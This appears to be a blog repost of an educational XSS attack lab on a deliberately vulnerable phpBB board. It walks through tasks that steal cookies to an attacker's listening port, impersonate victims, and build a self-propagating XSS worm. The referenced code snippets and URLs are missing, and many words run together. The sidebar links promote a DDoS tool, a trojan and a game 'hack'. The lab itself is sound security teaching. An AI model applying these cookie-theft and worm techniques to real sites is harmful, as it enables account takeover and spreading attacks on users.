Cross-Site Scripting (XSS) Attack Lab
Sunday, 1 July 2018
You May Like
- D-DOS Attacking Tool for Kali Linux Ubuntu and other Linux
- Watch Out! This New Web Exploit Can Crash and Restart Your iPhone
- PUBG UC HACKED ? How To Get Unlimited Uc in PUBG Game 2019 ? 100% Wirking Trick
- GoAT (Golang Advanced Trojan) is a trojan that uses Twitter as a C&C server
- Hackers: How can I get started with Ethical hacking ?
Cross-sitescripting(XSS)isatypeofvulnerabilitycommonlyfoundinwebapplications. Thisvulnerability makesitpossibleforattackerstoinjectmaliciouscode(e.g. JavaScriptprograms)intovictim’swebbrowser. Using this malicious code, the attackers can steal the victim’s credentials, such as cookies. The access control policies (i.e., the same origin policy) employed by the browser to protect those credentials can be bypassed by exploiting the XSS vulnerability. Vulnerabilities of this kind can potentially lead to large-scale attacks. To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web-based message board using phpBB. We modified the software to introduce an XSS vulnerability in this message board; this vulnerability allows users to post any arbitrary message to the board, including JavaScript programs. Students need to exploit this vulnerability by posting some malicious messages to the message board; users who view these malicious messages will become victims. The attackers’ goal is to post forged messages for the victims.
2 LabEnvironment
In this lab, we will need three things: (1) the Firefox web browser, (2) the apache web server, and (3) the phpBB message board web application. For the browser, we need to use the LiveHTTPHeaders extension for Firefox to inspect the HTTP requests and responses. The pre-built Ubuntu VM image provided to you has already installed the Firefox web browser with the required extensions.
Starting the Apache Server. The apache web server is also included in the pre-built Ubuntu image. However, the web server is not started by default. You have to first start the web server using one of the following two commands:
The phpBB Web Application. The phpBB web application is already set up in the pre-built Ubuntu VMimage. Wehavealsocreatedseveraluseraccountsinthe phpBB server. Thepasswordinformationcan be obtained from the posts on the front page. You can access the phpBB server using the following URL (the apache server needs to be started first):
Configuring DNS. This URL is only accessible from inside of the virtual machine, because we have modified the /etc/hosts file to map the domain name ( to the virtual machine’s local IP address ( You may map any domain name to a particular IP address using the /etc/hosts. For example you can map to the local IP address by appending the following entry to /etc/hosts file:
Therefore, if your web server and browser are running on two different machines, you need to modify the /etc/hosts file on the browser’s machine accordingly to map to the web server’s IP address.
Configuring Apache Server. In the pre-built VM image, we use Apache server to host all the web sites usedinthelab. Thename-basedvirtualhostingfeatureinApachecouldbeusedtohostseveralwebsites(or URLs) on the same machine. A configuration file named default in the directory "/etc/apache2/ sites-available" contains the necessary directives for the configuration:
1. The directive "NameVirtualHost *" instructs the web server to use all IP addresses in the machine (some machines may have multiple IP addresses).
2. Each web site has a VirtualHost block that specifies the URL for the web site and directory in the file system that contains the sources for the web site. For example, to configure a web site with URL with sources in directory /var/www/Example_1/, and to configure a web site with URL with sources in directory /var/www/Example_2/, we use the following blocks
Youmaymodifythewebapplicationbyaccessingthesourceinthementioneddirectories. Forexample, with the above configuration, the web application can be changed by modifying the sources in the directory /var/www/Example_1/.
Other software. Some of the lab tasks require some basic familiarity with JavaScript. Wherever necessary, we provide a sample JavaScript program to help the students get started. To complete task 3, students mayneedautilitytowatchincomingrequestsonaparticularTCPport. WeprovideaCprogramthatcanbe configuredtolistenonaparticularportanddisplayincomingmessages. TheCprogramcanbedownloaded from the web site for this lab.
NoteforInstructors This lab may be conducted in a supervised lab environment. In such a case, the instructor may provide the following background information to the students prior to doing the lab: 1. How to use the virtual machine, Firefox web browser, and the LiveHttpHeaders extension. 2. Basics of JavaScript and XMLHttpRequest object. 3. A brief overview of the tasks. 4. How to use the C program that listens on a port. 5. How to write a java program to send a HTTP message post.
3 LabTasks 3.1 Task1: PostingaMaliciousMessagetoDisplayanAlertWindow TheobjectiveofthistaskistopostamaliciousmessagethatcontainsJavaScripttodisplayanalertwindow. The JavaScript should be provided along with the user comments in the message. The following JavaScript will display an alert window:
If you post this JavaScript along with your comments in the message board, then any user who views this comment will see the alert window.
3.2 Task2: PostingaMaliciousMessagetoDisplayCookies TheobjectiveofthistaskistopostamaliciousmessageonthemessageboardcontainingaJavaScriptcode, such that whenever a user views this message, the user’s cookies will be printed out. For instance, consider the following message that contains a JavaScript code
When a user viewsthis message post, he/she will see apop-up message boxthat displays the cookies of the user.
3.3 Task3: StealingCookiesfromtheVictim’sMachine In the previous task, the malcious JavaScript code can print out the user’s cookies; in this task, the attacker wantstheJavaScriptcodetosendthecookiestothehimself/herself. Toachievethis,themaliciousJavaScript codecansendsendaHTTPrequesttotheattacker,withthecookiesappendedtotherequest. Wecandothis byhavingthemaliciousJavaScriptinserta<img>tagwithsrcsettotheURLoftheattackersdestination. When the JavaScript inserts the img tag, the browser tries to load the image from the mentioned URL and in the process ends up sending a HTTP GET request to the attackers website. The JavaScript given below sends the cookies to the mentioned port 5555 on the attacker’s machine. On the particular port, the attacker has a TCP server that simply prints out the request it receives. The TCP server program will be given to you (available on the web site of this lab).
3.4 Task4: ImpersonatingtheVictimusingtheStolenCookies Afterstealingthevictim’scookies,theattackercandowhateverthevictimcandotothe phpBB webserver, including posting a new message in the victim’s name, delete the victim’s post, etc. In this task, we will write a program to forge a message post on behalf of the victim. Toforgeamessagepost,weshouldfirstanalyzehow phpBB worksintermsofpostingmessages. More specifically, our goal is to figure out what are sent to the server when a user posts a message. Firefox’s LiveHTTPHeaders extension can help us; it can display the contents of any HTTP request message sent fromthebrowser. Fromthecontents,wecanidentifyallthetheparametersofthemessage. Ascreenshotof LiveHTTPHeaders is given in Figure1. The LiveHTTPHeaders extension can be downloaded from, and it is already installed in the pre-built Ubuntu VM image. Once we have understood what the HTTP request for message posting looks like, we can write a Java program to send out the same HTTP request. The phpBB server cannot distinguish whether the request is sent out by the user’s browser or by the attacker’s Java program. As long as we set all the parameters correctly, the server will accept and process the message-posting HTTP request. To simplify your task, we provide you with a sample java program that does the following:
1. Opens a connection to web server.
2. Sets the necessary HTTP header information.
3. Sends the request to web server.
4. Gets the response from web server.
If you have trouble understanding the above program, we suggest you to read the following: • JDK 6 Documentation: • Java Protocol Handler:
Limitation: The forged message post should be generated from the same virtual machine i.e. the victim (userconnectedtothewebforum)andtheattacker(onewhogeneratesaforgedmessagepost)shouldbeon the same machine because phpBB uses IP address and the cookies for session management. If the attacker generates the forged message post from a different machine, the IP address of the forged packet and the victim’sIPaddresswoulddifferandhencetheforgedmessagepostwouldberejectedbythe phpBB server, despite the fact that the forged message carries the correct cookie information.
3.5 Task5: WritinganXSSWorm Intheprevioustask,wehavelearnedhowtostealthecookiesfromthevictimandthenforgeHTTPrequests using the stolen cookies. In this task, we need to write a malicious JavaScript to forge a HTTP request directly from the victim’s browser. This attack does not require the intervention from the attacker. The JavaScript that can achieve this is called a cross-site scripting worm. For this web application, the worm program should do the following:
1. Retrieve the session ID of the user using JavaScript.
2. Forge a HTTP post request to post a message using the session ID.
TherearetwocommontypesofHTTPrequests,oneisHTTPGETrequest,andtheotherisHTTPPOST request. These two types of HTTP requests differ in how they send the contents of the request to the server. InphpBB,therequestforpostingamessageusesHTTPPOSTrequest. WecanusetheXMLHttpRequest object to send HTTP GET and POST requests for web applications. XMLHttpRequest can only send HTTPrequestsbacktotheserver,insteadofothercomputers,becausethesame-originpolicyisstronglyenforcedfor XMLHttpRequest. Thisisnotanissueforus,becausewedowanttouse XMLHttpRequest to send a forged HTTP POST request back to the phpBB server. To learn how to use XMLHttpRequest, youcanstudytheseciteddocuments[1,2]. IfyouarenotfamiliarwithJavaScriptprogramming,wesuggest that you read [3] to learn some basic JavaScript functions. You will have to use some of these functions: YoumayalsoneedtodebugyourJavaScriptcode. FirebugisaFirefoxextensionthathelpsyoudebug JavaScript code. It can point you to the precise places that contain errors. FireBug can be downloaded from It is already installed in our pre-built Ubuntu VM image.
Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to the phpBB message board, you need to remove all the comments, extra space, and new-line characters.
To make our worm work, we should pay attention to how the session id information is used by phpBB. From the output of the LiveHTTPHeaders extension, we can notice that sid appears twice in the message-posting request. One is in the cookie section (it is called phpbb2mysql sid). Therefore, the HTTP POST request sent out by XMLHttpRequest must also include the cookie. We already did it for you in the above skeleton code. If we look carefully at the LiveHTTPHeaders output, we can see that the same session id also appears in the line that starts with "subject=". The phpBB server uses the session id here to prevent another type of attack (i.e. the cross-site request forgery attack). In our forged message-posting request, we also need to add this session id information; the value of this session id is exactly the same as that in phpbb2mysql sid. Without this session id in the request, the request will be discarded by the server. In order to retrieve the sid information from the cookie, you may need to learn some string operations in JavaScript. You should study this cited tutorial [4].
3.6 Task6: WritingaSelf-PropagatingXSSWorm The worm built in the previous task only forges a message on behalf of the victims; it does not propagate itself. Therefore, technically speaking, it is not a worm. To be able to propagate itself, the forged message should also include a worm, so whenever somebody clicks on the forged message, a new forged message that carrythesameworm willbecreated. Thisway, thewormcanbepropagated. Themore people click on the forged messages, the faster the worm can propagate. In this task, you need to expand what you did in Task 5, and add a copy of the worm to the body of the forged message. The following guidelines will help you with the task:
1. The JavaScript program that posts the forged message is already part of the web page. Therefore, the worm code can use DOM APIs to retrieve a copy of itself from the web page. An example of using DOM APIs is given below. This code gets a copy of itself, and display it in an alert window:
URL Encoding : All messages transmitted using HTTP over the Internet use URL Encoding, which converts all non-ASCII characters such as space to special code under the URL encoding scheme. In the worm code, messages to be posted in the phpBB forum should be encoded using URL encoding. The escape function can be used to URL encode a string. An example of using the encode function is given below
3. UndertheURLencodingschemethe“+”symbolisusedtodenotespace. InJavaScriptprograms,“+” is used for both arithmetic operations and string concatenation operations. To avoid this ambiguity, you may use the concat function for string concatenation, and avoid using addition. For the worm code in the exercise, you don’t have to use additions. If you do have to add a number (e.g a+5), you can use subtraction (e.g a-(-5)).
4 Submission
You need to submit a detailed lab report to describe what you have done and what you have observed. Please provide details using LiveHTTPHeaders, Wireshark, and/or screenshots. You also need to provide explanation to the observations that are interesting or surprising.
[1] AJAX for n00bs. Available at the following URL:
[2] AJAX POST-It Notes. Available at the following URL:
[3] Essential Javascript – A Javascript Tutorial. Available at the following URL:
[4] The Complete Javascript Strings Reference. Available at the following URL:
Related Posts
Subscribe Our Newsletter